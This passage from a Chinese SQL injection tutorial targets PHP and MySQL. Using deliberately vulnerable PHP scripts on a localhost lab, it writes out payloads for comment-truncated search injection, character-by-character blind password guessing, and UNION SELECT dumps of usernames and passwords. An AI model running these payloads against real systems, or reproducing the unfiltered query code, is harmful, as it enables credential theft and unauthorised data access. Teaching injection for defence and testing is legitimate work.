语句构造

PHP+MYSQL注入的博大精深不仅仅体现在认证体系的饶过，语句的构造才是最有趣味的地方，但构造语句和ACCESS、MSSQL都有少许不同，但同样可以发挥得淋漓尽致。看下面的例子。

一、搜索引擎

网上有一大堆的PHP程序搜索引擎是有问题的，也就是提交特殊字符可以显示所有记录，包括不符合条件的，其实这个危害也不算大，因为允许用户输入关键字进行模糊查询的地方大多数都允许检索所有的记录。很多查询的设计就是这样的。
查询是只读的操作应该不会对数据产生破坏作用，不要太担心。不过泄露隐私不知道算不算危害，下面是一个标准的搜索引擎：

<form method="GET" action="search.php" name="search">
<input name="keywords" type="text" value="" size="15"> <input type="submit" value="Search">
</form>
<p><b>Search result</b></p>

<?php

//search.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$keywords = $_GET['keywords'];
if (!empty($keywords))
{
$sql = "SELECT * FROM article WHERE title LIKE '%$keywords%' $search ORDER BY title DESC";
$result = mysql_db_query($dbname,$sql);
$tatol=mysql_num_rows($result);

echo "<p>SQL Query:$sql<p>";
if ($tatol <=0){
echo "The \"<b>$keywords</b>\" was not found in all the record.<p>\n";
} else {
while ($article=mysql_fetch_array($result))
{
echo "<li>".htmlspecialchars($article[title])."<p>\n";
} //while
}
} else {
echo "<b>Please enter some keywords.</b><p>\n";
}
?>

一般程序都是这样写的，如果缺乏变量检查，我们就可以改写变量，达到"注入"的目的，尽管没有危害，当我们输入"___" 、".__ "、"%"等类似的关键字时，会把数据库中的所有记录都取出来。如果我们在表单提交：

%' ORDER BY articleid/*
%' ORDER BY articleid#
__' ORDER BY articleid/*
__' ORDER BY articleid#

SQL语句就被改变成下面的样子了，

SELECT * FROM article WHERE title LIKE '%%' ORDER BY articleid/*%' ORDER BY title DESC
SELECT * FROM article WHERE title LIKE '%__' ORDER BY articleid#%' ORDER BY title DESC

就会列出所有记录，包括被隐藏的，还可以改变排列顺序。这个虽然危害不大，也算是注入的一种方式了吧？

二、查询字段

查询字段又可以分成两种，本表查询和跨表查询，这两种查询和ACCESS、MSSQL差不多，甚至更强大、更灵活、更方便。不知道为什么就是有人认为比ASP难？我们在ASP中经常使用的个别函数在PHP里要有小小的改动，如下：

① 本表查询

看下面一条SQL语句，多用在论坛或者会员注册系统查看用户资料的，

<?php
//user.php

$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "injection";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "SELECT * FROM user WHERE username='$username'";
$result = mysql_db_query($dbname,$sql);
$row = mysql_fetch_array($result);

if (!$row)
{
echo "该记录不存在";
echo "<p>SQL Query:$sql<p>";
exit;
}

echo "你要查询的用户ID是：$row[userid]\n";
echo "<p>SQL Query:$sql<p>";
?>

当我们提交的用户名为真时，就会正常返回用户的ID，如果为非法参数就会提示相应的错误，由于是查询用户资料，我们可以大胆猜测密码就存在这个数据表里（现在我还没有碰见过密码是单独存在另一个表的程序），记得刚才的身份验证程序吗？和现在的相比，就少了一个AND条件，如下：

SELECT * FROM user WHERE username='$username' AND password='$password'
SELECT * FROM user WHERE username='$username'

相同的就是当条件为真时，就会给出正确的提示信息，如果我们构造出后面的AND条件部分，并使这部分为真，那我们的目的也就达到了，还是利用刚才建立的user数据库，用户名为angel，密码为mypass，
看了上面的例子，应该知道构造了吧，如果我们提交：

http://127.0.0.1/injection/user.php?username=angel&#39; and password='mypass

这个是绝对为真的，因为我们这样提交上面的SQL语句变成了下面的样子：

SELECT * FROM user WHERE username='angel' AND password='mypass'

但在实际的攻击中，我们是肯定不知道密码的，假设我们知道数据库的各个字段，下面我们就开始探测密码了，首先获取密码长度：

http://127.0.0.1/injection/user.php?username=angel&#39; and LENGTH(password)='6

在ACCESS中，用LEN()函数来获取字符串长度，在MYSQL中，要使用LENGTH()，只要没有构造错误，也就是说SQL语句能正常执行，那返回结果无外乎两种，不是返回用户ID，就是返回"该记录不存在"。当用户名为angel并且密码长度为6的时候返回真，就会返回相关记录，是不是和ASP里一样？再用LEFT()、RIGHT()、MID()函数猜密码：

http://127.0.0.1/injection/user.php?username=angel&#39; and LEFT(password,1)='m
http://127.0.0.1/injection/user.php?username=angel&#39; and LEFT(password,2)='my
http://127.0.0.1/injection/user.php?username=angel&#39; and LEFT(password,3)='myp
http://127.0.0.1/injection/user.php?username=angel&#39; and LEFT(password,4)='mypa

http://127.0.0.1/injection/user.php?username=angel&#39; and LEFT(password,5)='mypas
http://127.0.0.1/injection/user.php?username=angel&#39; and LEFT(password,6)='mypass

看，密码不是出来了吗？简单吧？当然实际情况会有不少条件限制，下面还会讲到这个例子的深入应用。

② 跨表查询
这部分就和ASP有点出入了，除了一定要用UNION连接两条SQL语句，最难掌握的就是字段的数量，如果看过MYSQL参考手册，就知道了在 SELECT 中的 select_expression (select_expression 表示你希望检索的列[字段]) 部分列出的列必须具有同样的类型。第一个 SELECT 查询中使用的列名将作为结果集的列名返回。简单的说，也就是UNION后面查选的字段数量、字段类型都应该与前面的SELECT一样，而且，如果前面的SELECT为真，就同时返回两个SELECT的结果，当前面的SELECT为假，就会返回第二个SELECT所得的结果，某些情况会替换掉在第一个SELECT原来应该显示的字段，如下图：

看了这个图直观多了吧？所以应该先知道前面查询表的数据表的结构。如果我们查询两个数据表的字段相同，类型也相同，我们就可以这样提交:

SELECT * FROM article WHERE articleid='$id' UNION SELECT * FROM......

如果字段数量、字段类型任意一个不相同，就只能搞清除数据类型和字段数量，这样提交：

SELECT * FROM article WHERE articleid='$id' UNION SELECT 1,1,1,1,1,1,1 FROM......

否则就会报错：

The used SELECT statements have a different number of columns

如果不知道数据类型和字段数量，可以用1来慢慢试，因为1属于int\str\var类型，所以我们只要慢慢改变数量，一定可以猜到的。如果不能马上理解上面的理论，后面有很详细的例子。
我们看看下面的数据结构，是一个简单的文章数据表。

CREATE TABLE `article` (
`articleid` int(11) NOT NULL auto_increment,
`title` varchar(100) NOT NULL default '',
`content` text NOT NULL,
PRIMARY KEY (`articleid`)
);

这个表的字段类型分别是int、varchar、text，如果我们用UNION联合查询的时候，后面的查询的表的结构和这个一样。就可以用"SELECT *"，如果有任何一个不一样，那我们只能用"SELECT 1,1,1,1......"了。

下面的文件是一个很标准、简单的显示文章的文件，很多站点都是这种页面没有过滤，所以成为最明显的注入点，下面就拿这个文件作为例子，开始我们的注入实验。

<?php
//show.php

$servername = "localhost";

$dbusername = "root";
$dbpassword = "";
$dbname = "injection";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "SELECT * FROM article WHERE articleid='$id'";
$result = mysql_db_query($dbname,$sql);
$row = mysql_fetch_array($result);

if (!$row)
{
echo "该记录不存在";
echo "<p>SQL Query:$sql<p>";
exit;
}

echo "title<br>".$row[title]."<p>\n";
echo "content<br>".$row[content]."<p>\n";
echo "<p>SQL Query:$sql<p>";
?>

正常情况下，我们提交这样的一个请求：

http://127.0.0.1/injection/show.php?id=1

就会显示articleid为1的文章，但我们不需要文章，我们需要的是用户的敏感信息，就要查询user表，现在是查询刚才我们建立的user表。
由于$id没有过滤给我们制造了这个机会，我们要把show.php文件中的SQL语句改写成类似这个样子：
SELECT * FROM article WHERE articleid='$id' UNION SELECT * FROM user ......

由于这个代码是有单引号包含着变量的，我们现在提交：

http://127.0.0.1/injection/show.php?id=1&#39; union select 1,username,password from user/*

按道理说，应该显示用户表的username、password两个字段的内容才对啊，怎么正常显示文章呢？

其实，我们提交的articleid=1是article表里存在的，执行结果就是真了，自然返回前面SELECT的结果，当我们提交空的值或者提交一个不存在的值，就会蹦出我们想要的东西：

http://127.0.0.1/injection/show.php?id=&#39; union select 1,username,password from user/*
http://127.0.0.1/injection/show.php?id=99999&#39; union select 1,username,password from user/*

现在就在字段相对应的地方显示出我们所要的内容。如果还不清楚思路以及具体的应用，后面还会讲到一些高级的技巧。

上一页  [1] [2] [3] [4] [5] 下一页